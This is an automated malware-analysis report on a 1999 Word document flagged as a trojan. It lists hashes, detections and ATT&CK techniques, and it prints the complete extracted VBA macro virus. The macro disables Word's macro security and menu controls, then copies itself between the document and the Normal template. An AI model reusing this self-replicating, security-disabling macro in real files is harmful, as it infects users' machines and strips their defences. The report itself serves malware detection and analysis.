Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cd95fcb6939b7a6e…

MALICIOUS

Office (OLE)

39.5 KB Created: 1999-11-05 09:53:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 6c92160960f0552ee6cb43c169a7787a SHA-1: 2728b009a4548e082136342c87d948d29ae54b27 SHA-256: cd95fcb6939b7a6e4df0267bedbacb253ff484dd22bd9fad07bdebb8c0c23e57
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen macro, which is a common technique for malicious Office documents. The script attempts to disable security features and modify macro settings by writing to the registry key HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security. It also contains an embedded URL, http://www.bigbrotherinside.com, which may be used for further payload delivery. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Bench-1' further indicate malicious intent.

Heuristics 6

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bigbrotherinside.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2959 bytes
SHA-256: 7e31fab920789af7d16c0b1ace907b2a363ed113e38ae3dbcaf2028a80663c8c
Detection
ClamAV: Doc.Trojan.Bench-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
MACRONAME = BENCH2
On Error Resume Next
Application.Options.ConfirmConversions = 1 - 1
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable: FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
With CommandBars("Tools")
    .Controls("Macro").Delete
    .Controls("Customize...").Delete
    .Controls("Templates and Add-Ins...").Delete
End With
CommandBars("Format").Controls("Style...").Enabled = 0: CommandBars("View").Controls("Toolbars").Enabled = 0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
If Application.Version = 9# Then
CommandBars("Macro").Controls("Security...").Delete
Else
With Application.Options
    .VirusProtection = 1 - 1
    .SaveNormalPrompt = 1 - 1
End With
End If
AI = False: NI = False
Set AL = ActiveDocument.VBProject.vbcomponents.Item(1): Set NL = NormalTemplate.VBProject.vbcomponents.Item(1)
A_AmIReAL = AL.CodeModule.Lines(2, 1): N_AmIReal = NL.CodeModule.Lines(2, 1)
If UCase(A_AmIReAL) = "MACRONAME = BENCH2" Then AI = True: If UCase(N_AmIReal) = "MACRONAME = BENCH2" Then NI = True
If AI = True And NI = True Then GoTo 0
Application.ScreenUpdating = 1 - 1
If AI = False Then
himala = AL.CodeModule.Countoflines
torpedo = NL.CodeModule.Countoflines
If himala > 0 Then AL.CodeModule.Deletelines 1, himala
With AL.CodeModule
    .addfromstring ("Sub AutoOpen()" & vbCr & NL.CodeModule.Lines(2, torpedo))
End With
End If
If NI = False Then
Luha = AL.CodeModule.Countoflines
Exodus = NL.CodeModule.Countoflines
If Exodus > 0 Then NL.CodeModule.Deletelines 1, Exodus
With NL.CodeModule
.addfromstring ("Sub AutoClose()" & vbCr & AL.CodeModule.Lines(2, Luha))
End With
End If
0:
If MacroContainer = ActiveDocument Then
If Minute(Now) >= 25 And Minute(Now) <= 40 Then
    With Assistant.NewBalloon
        .Icon = msoIconAlert
        .Heading = "[Bench]"
        .Text = "I'm not suffering from insanity! I'm enjoying every minute of it!"
        .Show
    End With
ActiveDocument.Content.Font.Animation = wdAnimationShimmer
ElseIf Minute(Now) > 40 And Minute(Now) <= 59 Then
    With Assistant.NewBalloon
        .Icon = msoIconAlert
        .Heading = "Defend your PC's privacy!"
        .Text = "Boycott Intel!" & vbCr & "http://www.bigbrotherinside.com"
        .Animation = msoAnimationGetAttentionMajor
        .Show
    End With
End If
End If
If NI = True And AI = False And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.